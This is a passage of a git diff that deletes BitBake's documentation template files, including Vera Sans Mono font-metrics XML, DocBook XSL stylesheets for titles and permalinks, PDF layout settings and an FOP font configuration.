us="732"/><bf gi="222" ue="733" us="733"/><bf gi="159" ue="937" us="937"/><bf gi="155" ue="960" us="960"/><bf gi="178" ue="8212" us="8211"/><bf gi="0" ue="8213" us="8213"/><bf gi="0" ue="8214" us="8214"/><bf gi="0" ue="8215" us="8215"/><bf gi="182" ue="8217" us="8216"/><bf gi="196" ue="8218" us="8218"/><bf gi="0" ue="8219" us="8219"/><bf gi="180" ue="8221" us="8220"/><bf gi="197" ue="8222" us="8222"/><bf gi="0" ue="8223" us="8223"/><bf gi="130" ue="8224" us="8224"/><bf gi="194" ue="8225" us="8225"/><bf gi="135" ue="8226" us="8226"/><bf gi="0" ue="8227" us="8227"/><bf gi="0" ue="8228" us="8228"/><bf gi="0" ue="8229" us="8229"/><bf gi="171" ue="8230" us="8230"/><bf gi="198" ue="8240" us="8240"/><bf gi="190" ue="8250" us="8249"/><bf gi="258" ue="8364" us="8364"/><bf gi="140" ue="8482" us="8482"/><bf gi="152" ue="8706" us="8706"/><bf gi="0" ue="8707" us="8707"/><bf gi="0" ue="8708" us="8708"/><bf gi="0" ue="8709" us="8709"/><bf gi="168" ue="8710" us="8710"/><bf gi="154" ue="8719" us="8719"/><bf gi="0" ue="8720" us="8720"/><bf gi="153" ue="8721" us="8721"/><bf gi="238" ue="8722" us="8722"/><bf gi="0" ue="8723" us="8723"/><bf gi="0" ue="8724" us="8724"/><bf gi="188" ue="8725" us="8725"/><bf gi="0" ue="8726" us="8726"/><bf gi="0" ue="8727" us="8727"/><bf gi="0" ue="8728" us="8728"/><bf gi="257" ue="8729" us="8729"/><bf gi="165" ue="8730" us="8730"/><bf gi="0" ue="8731" us="8731"/><bf gi="0" ue="8732" us="8732"/><bf gi="0" ue="8733" us="8733"/><bf gi="146" ue="8734" us="8734"/><bf gi="156" ue="8747" us="8747"/><bf gi="167" ue="8776" us="8776"/><bf gi="143" ue="8800" us="8800"/><bf gi="0" ue="8801" us="8801"/><bf gi="0" ue="8802" us="8802"/><bf gi="0" ue="8803" us="8803"/><bf gi="148" ue="8805" us="8804"/><bf gi="185" ue="9674" us="9674"/><bf gi="192" ue="64258" us="64257"/><bf gi="0" ue="65535" us="65535"/></bfranges><cid-widths start-index="0"><wx w="602"/><wx w="0"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx 
w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx 
w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/></cid-widths></multibyte-extras></font-metrics> \ No newline at end of file
diff --git a/bitbake/doc/template/VeraMono.xml b/bitbake/doc/template/VeraMono.xml
deleted file mode 100644
index 3a0a86659c..0000000000
--- a/bitbake/doc/template/VeraMono.xml
+++ /dev/null
@@ -1 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?><font-metrics metrics-version="2" type="TYPE0"><font-name>BitstreamVeraSansMono-Roman</font-name><full-name>Bitstream Vera Sans Mono</full-name><family-name>Bitstream Vera Sans Mono</family-name><embed/><cap-height>729</cap-height><x-height>546</x-height><ascender>759</ascender><descender>-240</descender><bbox><left>-4</left><bottom>-235</bottom><right>605</right><top>928</top></bbox><flags>34</flags><stemv>0</stemv><italicangle>0</italicangle><subtype>TYPE0</subtype><multibyte-extras><cid-type>CIDFontType2</cid-type><default-width>0</default-width><bfranges><bf gi="3" ue="126" us="32"/><bf gi="172" ue="160" us="160"/><bf gi="163" ue="161" us="161"/><bf gi="132" ue="163" us="162"/><bf gi="189" ue="164" us="164"/><bf gi="150" ue="165" us="165"/><bf gi="231" ue="166" us="166"/><bf gi="134" ue="167" us="167"/><bf gi="142" ue="168" us="168"/><bf gi="139" ue="169" us="169"/><bf gi="157" ue="170" us="170"/><bf gi="169" ue="171" us="171"/><bf gi="164" ue="172" us="172"/><bf gi="256" ue="173" us="173"/><bf gi="138" ue="174" us="174"/><bf gi="217" ue="175" us="175"/><bf gi="131" ue="176" us="176"/><bf gi="147" ue="177" us="177"/><bf gi="241" ue="179" us="178"/><bf gi="141" ue="180" us="180"/><bf gi="151" ue="181" us="181"/><bf gi="136" ue="182" us="182"/><bf gi="195" ue="183" us="183"/><bf gi="221" ue="184" us="184"/><bf gi="240" ue="185" us="185"/><bf gi="158" ue="186" us="186"/><bf gi="170" ue="187" us="187"/><bf gi="243" ue="190" us="188"/><bf gi="162" ue="191" us="191"/><bf gi="173" ue="192" us="192"/><bf gi="201" ue="193" us="193"/><bf gi="199" ue="194" us="194"/><bf gi="174" ue="195" us="195"/><bf gi="98" ue="197" us="196"/><bf gi="144" ue="198" us="198"/><bf gi="100" ue="199" us="199"/><bf gi="203" ue="200" us="200"/><bf gi="101" ue="201" us="201"/><bf gi="200" ue="202" us="202"/><bf gi="202" ue="203" us="203"/><bf gi="207" ue="204" us="204"/><bf gi="204" ue="207" us="205"/><bf gi="232" ue="208" us="208"/><bf gi="102" ue="209" 
us="209"/><bf gi="210" ue="210" us="210"/><bf gi="208" ue="212" us="211"/><bf gi="175" ue="213" us="213"/><bf gi="103" ue="214" us="214"/><bf gi="239" ue="215" us="215"/><bf gi="145" ue="216" us="216"/><bf gi="213" ue="217" us="217"/><bf gi="211" ue="219" us="218"/><bf gi="104" ue="220" us="220"/><bf gi="234" ue="221" us="221"/><bf gi="236" ue="222" us="222"/><bf gi="137" ue="223" us="223"/><bf gi="106" ue="224" us="224"/><bf gi="105" ue="225" us="225"/><bf gi="107" ue="226" us="226"/><bf gi="109" ue="227" us="227"/><bf gi="108" ue="228" us="228"/><bf gi="110" ue="229" us="229"/><bf gi="160" ue="230" us="230"/><bf gi="111" ue="231" us="231"/><bf gi="113" ue="232" us="232"/><bf gi="112" ue="233" us="233"/><bf gi="114" ue="235" us="234"/><bf gi="117" ue="236" us="236"/><bf gi="116" ue="237" us="237"/><bf gi="118" ue="239" us="238"/><bf gi="233" ue="240" us="240"/><bf gi="120" ue="241" us="241"/><bf gi="122" ue="242" us="242"/><bf gi="121" ue="243" us="243"/><bf gi="123" ue="244" us="244"/><bf gi="125" ue="245" us="245"/><bf gi="124" ue="246" us="246"/><bf gi="184" ue="247" us="247"/><bf gi="161" ue="248" us="248"/><bf gi="127" ue="249" us="249"/><bf gi="126" ue="250" us="250"/><bf gi="128" ue="252" us="251"/><bf gi="235" ue="253" us="253"/><bf gi="237" ue="254" us="254"/><bf gi="186" ue="255" us="255"/><bf gi="251" ue="263" us="262"/><bf gi="253" ue="269" us="268"/><bf gi="0" ue="270" us="270"/><bf gi="0" ue="271" us="271"/><bf gi="0" ue="272" us="272"/><bf gi="255" ue="273" us="273"/><bf gi="246" ue="287" us="286"/><bf gi="248" ue="304" us="304"/><bf gi="214" ue="305" us="305"/><bf gi="225" ue="322" us="321"/><bf gi="176" ue="339" us="338"/><bf gi="249" ue="351" us="350"/><bf gi="227" ue="353" us="352"/><bf gi="187" ue="376" us="376"/><bf gi="229" ue="382" us="381"/><bf gi="166" ue="402" us="402"/><bf gi="215" ue="710" us="710"/><bf gi="224" ue="711" us="711"/><bf gi="218" ue="730" us="728"/><bf gi="223" ue="731" us="731"/><bf gi="216" ue="732" us="732"/><bf 
gi="222" ue="733" us="733"/><bf gi="159" ue="937" us="937"/><bf gi="155" ue="960" us="960"/><bf gi="178" ue="8212" us="8211"/><bf gi="0" ue="8213" us="8213"/><bf gi="0" ue="8214" us="8214"/><bf gi="0" ue="8215" us="8215"/><bf gi="182" ue="8217" us="8216"/><bf gi="196" ue="8218" us="8218"/><bf gi="0" ue="8219" us="8219"/><bf gi="180" ue="8221" us="8220"/><bf gi="197" ue="8222" us="8222"/><bf gi="0" ue="8223" us="8223"/><bf gi="130" ue="8224" us="8224"/><bf gi="194" ue="8225" us="8225"/><bf gi="135" ue="8226" us="8226"/><bf gi="0" ue="8227" us="8227"/><bf gi="0" ue="8228" us="8228"/><bf gi="0" ue="8229" us="8229"/><bf gi="171" ue="8230" us="8230"/><bf gi="198" ue="8240" us="8240"/><bf gi="190" ue="8250" us="8249"/><bf gi="258" ue="8364" us="8364"/><bf gi="140" ue="8482" us="8482"/><bf gi="152" ue="8706" us="8706"/><bf gi="0" ue="8707" us="8707"/><bf gi="0" ue="8708" us="8708"/><bf gi="0" ue="8709" us="8709"/><bf gi="168" ue="8710" us="8710"/><bf gi="154" ue="8719" us="8719"/><bf gi="0" ue="8720" us="8720"/><bf gi="153" ue="8721" us="8721"/><bf gi="238" ue="8722" us="8722"/><bf gi="0" ue="8723" us="8723"/><bf gi="0" ue="8724" us="8724"/><bf gi="188" ue="8725" us="8725"/><bf gi="0" ue="8726" us="8726"/><bf gi="0" ue="8727" us="8727"/><bf gi="0" ue="8728" us="8728"/><bf gi="257" ue="8729" us="8729"/><bf gi="165" ue="8730" us="8730"/><bf gi="0" ue="8731" us="8731"/><bf gi="0" ue="8732" us="8732"/><bf gi="0" ue="8733" us="8733"/><bf gi="146" ue="8734" us="8734"/><bf gi="156" ue="8747" us="8747"/><bf gi="167" ue="8776" us="8776"/><bf gi="143" ue="8800" us="8800"/><bf gi="0" ue="8801" us="8801"/><bf gi="0" ue="8802" us="8802"/><bf gi="0" ue="8803" us="8803"/><bf gi="148" ue="8805" us="8804"/><bf gi="185" ue="9674" us="9674"/><bf gi="192" ue="64258" us="64257"/><bf gi="0" ue="65535" us="65535"/></bfranges><cid-widths start-index="0"><wx w="602"/><wx w="0"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx 
w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx 
w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/></cid-widths></multibyte-extras></font-metrics> \ No newline at end of file
diff --git a/bitbake/doc/template/component.title.xsl b/bitbake/doc/template/component.title.xsl
deleted file mode 100644
index faef043268..0000000000
--- a/bitbake/doc/template/component.title.xsl
+++ /dev/null
@@ -1,39 +0,0 @@
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:d="http://docbook.org/ns/docbook"
- xmlns="http://www.w3.org/1999/xhtml"
- exclude-result-prefixes="d">
-
- <xsl:template name="component.title">
- <xsl:param name="node" select="."/>
-
- <xsl:variable name="level">
- <xsl:choose>
- <xsl:when test="ancestor::d:section">
- <xsl:value-of select="count(ancestor::d:section)+1"/>
- </xsl:when>
- <xsl:when test="ancestor::d:sect5">6</xsl:when>
- <xsl:when test="ancestor::d:sect4">5</xsl:when>
- <xsl:when test="ancestor::d:sect3">4</xsl:when>
- <xsl:when test="ancestor::d:sect2">3</xsl:when>
- <xsl:when test="ancestor::d:sect1">2</xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:element name="h{$level+1}" namespace="http://www.w3.org/1999/xhtml">
- <xsl:attribute name="class">title</xsl:attribute>
- <xsl:if test="$generate.id.attributes = 0">
- <xsl:call-template name="anchor">
- <xsl:with-param name="node" select="$node"/>
- <xsl:with-param name="conditional" select="0"/>
- </xsl:call-template>
- </xsl:if>
- <xsl:apply-templates select="$node" mode="object.title.markup">
- <xsl:with-param name="allow-anchors" select="1"/>
- </xsl:apply-templates>
- <xsl:call-template name="permalink">
- <xsl:with-param name="node" select="$node"/>
- </xsl:call-template>
- </xsl:element>
- </xsl:template>
-</xsl:stylesheet>
diff --git a/bitbake/doc/template/db-pdf.xsl b/bitbake/doc/template/db-pdf.xsl
deleted file mode 100644
index 3dd065a57e..0000000000
--- a/bitbake/doc/template/db-pdf.xsl
+++ /dev/null
@@ -1,64 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/current/fo/docbook.xsl" />
-
- <!-- check project-plan.sh for how this is generated, needed to tweak
- the cover page
- -->
- <xsl:include href="/tmp/titlepage.xsl"/>
-
- <!-- To force a page break in document, i.e per section add a
- <?hard-pagebreak?> tag.
- -->
- <xsl:template match="processing-instruction('hard-pagebreak')">
- <fo:block break-before='page' />
- </xsl:template>
-
- <!--Fix for defualt indent getting TOC all wierd..
- See http://sources.redhat.com/ml/docbook-apps/2005-q1/msg00455.html
- FIXME: must be a better fix
- -->
- <xsl:param name="body.start.indent" select="'0'"/>
- <!--<xsl:param name="title.margin.left" select="'0'"/>-->
-
- <!-- stop long-ish header titles getting wrapped -->
- <xsl:param name="header.column.widths">1 10 1</xsl:param>
-
- <!-- customise headers and footers a little -->
-
- <xsl:template name="head.sep.rule">
- <xsl:if test="$header.rule != 0">
- <xsl:attribute name="border-bottom-width">0.5pt</xsl:attribute>
- <xsl:attribute name="border-bottom-style">solid</xsl:attribute>
- <xsl:attribute name="border-bottom-color">#cccccc</xsl:attribute>
- </xsl:if>
- </xsl:template>
-
- <xsl:template name="foot.sep.rule">
- <xsl:if test="$footer.rule != 0">
- <xsl:attribute name="border-top-width">0.5pt</xsl:attribute>
- <xsl:attribute name="border-top-style">solid</xsl:attribute>
- <xsl:attribute name="border-top-color">#cccccc</xsl:attribute>
- </xsl:if>
- </xsl:template>
-
- <xsl:attribute-set name="header.content.properties">
- <xsl:attribute name="color">#cccccc</xsl:attribute>
- </xsl:attribute-set>
-
- <xsl:attribute-set name="footer.content.properties">
- <xsl:attribute name="color">#cccccc</xsl:attribute>
- </xsl:attribute-set>
-
-
- <!-- general settings -->
-
- <xsl:param name="fop1.extensions" select="1"></xsl:param>
- <xsl:param name="paper.type" select="'A4'"></xsl:param>
- <xsl:param name="section.autolabel" select="1"></xsl:param>
- <xsl:param name="body.font.family" select="'verasans'"></xsl:param>
- <xsl:param name="title.font.family" select="'verasans'"></xsl:param>
- <xsl:param name="monospace.font.family" select="'veramono'"></xsl:param>
-
-</xsl:stylesheet>
diff --git a/bitbake/doc/template/division.title.xsl b/bitbake/doc/template/division.title.xsl
deleted file mode 100644
index 9c843bc7c4..0000000000
--- a/bitbake/doc/template/division.title.xsl
+++ /dev/null
@@ -1,25 +0,0 @@
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:d="http://docbook.org/ns/docbook"
- xmlns="http://www.w3.org/1999/xhtml"
- exclude-result-prefixes="d">
-
- <xsl:template name="division.title">
- <xsl:param name="node" select="."/>
-
- <h1>
- <xsl:attribute name="class">title</xsl:attribute>
- <xsl:call-template name="anchor">
- <xsl:with-param name="node" select="$node"/>
- <xsl:with-param name="conditional" select="0"/>
- </xsl:call-template>
- <xsl:apply-templates select="$node" mode="object.title.markup">
- <xsl:with-param name="allow-anchors" select="1"/>
- </xsl:apply-templates>
- <xsl:call-template name="permalink">
- <xsl:with-param name="node" select="$node"/>
- </xsl:call-template>
- </h1>
- </xsl:template>
-</xsl:stylesheet>
-
diff --git a/bitbake/doc/template/fop-config.xml b/bitbake/doc/template/fop-config.xml
deleted file mode 100644
index 09cc5ca0f5..0000000000
--- a/bitbake/doc/template/fop-config.xml
+++ /dev/null
@@ -1,58 +0,0 @@
-<fop version="1.0">
-
- <!-- Strict user configuration -->
- <strict-configuration>true</strict-configuration>
-
- <!-- Strict FO validation -->
- <strict-validation>true</strict-validation>
-
- <!--
- Set the baseDir so common/openedhand.svg references in plans still
- work ok. Note, relative file references to current dir should still work.
- -->
- <base>../template</base>
- <font-base>../template</font-base>
-
- <!-- Source resolution in dpi (dots/pixels per inch) for determining the
- size of pixels in SVG and bitmap images, default: 72dpi -->
- <!-- <source-resolution>72</source-resolution> -->
- <!-- Target resolution in dpi (dots/pixels per inch) for specifying the
- target resolution for generated bitmaps, default: 72dpi -->
- <!-- <target-resolution>72</target-resolution> -->
-
- <!-- default page-height and page-width, in case
- value is specified as auto -->
- <default-page-settings height="11in" width="8.26in"/>
-
- <!-- <use-cache>false</use-cache> -->
-
- <renderers>
- <renderer mime="application/pdf">
- <fonts>
- <font metrics-file="VeraMono.xml"
- kerning="yes"
- embed-url="VeraMono.ttf">
- <font-triplet name="veramono" style="normal" weight="normal"/>
- </font>
-
- <font metrics-file="VeraMoBd.xml"
- kerning="yes"
- embed-url="VeraMoBd.ttf">
- <font-triplet name="veramono" style="normal" weight="bold"/>
- </font>
-
- <font metrics-file="Vera.xml"
- kerning="yes"
- embed-url="Vera.ttf">
- <font-triplet name="verasans" style="normal" weight="normal"/>
- <font-triplet name="verasans" style="normal" weight="bold"/>
- <font-triplet name="verasans" style="italic" weight="normal"/>
- <font-triplet name="verasans" style="italic" weight="bold"/>
- </font>
-
- <auto-detect/>
- </fonts>
- </renderer>
- </renderers>
-</fop>
-
diff --git a/bitbake/doc/template/formal.object.heading.xsl b/bitbake/doc/template/formal.object.heading.xsl
deleted file mode 100644
index 4f3900d165..0000000000
--- a/bitbake/doc/template/formal.object.heading.xsl
+++ /dev/null
@@ -1,21 +0,0 @@
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:d="http://docbook.org/ns/docbook"
- xmlns="http://www.w3.org/1999/xhtml"
- exclude-result-prefixes="d">
-
- <xsl:template name="formal.object.heading">
- <xsl:param name="object" select="."/>
- <xsl:param name="title">
- <xsl:apply-templates select="$object" mode="object.title.markup">
- <xsl:with-param name="allow-anchors" select="1"/>
- </xsl:apply-templates>
- </xsl:param>
- <p class="title">
- <b><xsl:copy-of select="$title"/></b>
- <xsl:call-template name="permalink">
- <xsl:with-param name="node" select="$object"/>
- </xsl:call-template>
- </p>
- </xsl:template>
-</xsl:stylesheet>
\ No newline at end of file
diff --git a/bitbake/doc/template/gloss-permalinks.xsl b/bitbake/doc/template/gloss-permalinks.xsl
deleted file mode 100644
index 6bf58116f6..0000000000
--- a/bitbake/doc/template/gloss-permalinks.xsl
+++ /dev/null
@@ -1,14 +0,0 @@
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:d="http://docbook.org/ns/docbook"
- xmlns="http://www.w3.org/1999/xhtml">
-
- <xsl:template match="glossentry/glossterm">
- <xsl:apply-imports/>
- <xsl:if test="$generate.permalink != 0">
- <xsl:call-template name="permalink">
- <xsl:with-param name="node" select=".."/>
- </xsl:call-template>
- </xsl:if>
- </xsl:template>
-</xsl:stylesheet>
diff --git a/bitbake/doc/template/permalinks.xsl b/bitbake/doc/template/permalinks.xsl
deleted file mode 100644
index d2a1c14524..0000000000
--- a/bitbake/doc/template/permalinks.xsl
+++ /dev/null
@@ -1,25 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<xsl:stylesheet version="1.0"
- xmlns="http://www.w3.org/1999/xhtml"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-
- <xsl:param name="generate.permalink" select="1"/>
- <xsl:param name="permalink.text">¶</xsl:param>
-
- <xsl:template name="permalink">
- <xsl:param name="node"/>
-
- <xsl:if test="$generate.permalink != '0'">
- <span class="permalink">
- <a alt="Permalink" title="Permalink">
- <xsl:attribute name="href">
- <xsl:call-template name="href.target">
- <xsl:with-param name="object" select="$node"/>
- </xsl:call-template>
- </xsl:attribute>
- <xsl:copy-of select="$permalink.text"/>
- </a>
- </span>
- </xsl:if>
- </xsl:template>
-</xsl:stylesheet>
diff --git a/bitbake/doc/template/section.title.xsl b/bitbake/doc/template/section.title.xsl
deleted file mode 100644
index 5c6ff9a96e..0000000000
--- a/bitbake/doc/template/section.title.xsl
+++ /dev/null
@@ -1,55 +0,0 @@
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:d="http://docbook.org/ns/docbook"
- xmlns="http://www.w3.org/1999/xhtml" exclude-result-prefixes="d">
-
- <xsl:template name="section.title">
- <xsl:variable name="section"
- select="(ancestor::section |
- ancestor::simplesect|
- ancestor::sect1|
- ancestor::sect2|
- ancestor::sect3|
- ancestor::sect4|
- ancestor::sect5)[last()]"/>
-
- <xsl:variable name="renderas">
- <xsl:choose>
- <xsl:when test="$section/@renderas = 'sect1'">1</xsl:when>
- <xsl:when test="$section/@renderas = 'sect2'">2</xsl:when>
- <xsl:when test="$section/@renderas = 'sect3'">3</xsl:when>
- <xsl:when test="$section/@renderas = 'sect4'">4</xsl:when>
- <xsl:when test="$section/@renderas = 'sect5'">5</xsl:when>
- <xsl:otherwise><xsl:value-of select="''"/></xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
-
- <xsl:variable name="level">
- <xsl:choose>
- <xsl:when test="$renderas != ''">
- <xsl:value-of select="$renderas"/>
- </xsl:when>
- <xsl:otherwise>
- <xsl:call-template name="section.level">
- <xsl:with-param name="node" select="$section"/>
- </xsl:call-template>
- </xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
-
- <xsl:call-template name="section.heading">
- <xsl:with-param name="section" select="$section"/>
- <xsl:with-param name="level" select="$level"/>
- <xsl:with-param name="title">
- <xsl:apply-templates select="$section" mode="object.title.markup">
- <xsl:with-param name="allow-anchors" select="1"/>
- </xsl:apply-templates>
- <xsl:if test="$level &gt; 0">
- <xsl:call-template name="permalink">
- <xsl:with-param name="node" select="$section"/>
- </xsl:call-template>
- </xsl:if>
- </xsl:with-param>
- </xsl:call-template>
- </xsl:template>
-</xsl:stylesheet>
diff --git a/bitbake/doc/template/titlepage.templates.xml b/bitbake/doc/template/titlepage.templates.xml
deleted file mode 100644
index 38ec11a4c3..0000000000
--- a/bitbake/doc/template/titlepage.templates.xml
+++ /dev/null
@@ -1,1259 +0,0 @@
-<!DOCTYPE t:templates [
-<!ENTITY hsize0 "10pt">
-<!ENTITY hsize1 "12pt">
-<!ENTITY hsize2 "14.4pt">
